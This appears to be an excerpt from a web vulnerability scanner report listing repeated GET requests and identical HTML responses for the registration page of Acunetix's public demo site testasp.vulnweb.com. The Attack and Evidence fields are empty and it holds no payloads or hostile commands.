Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
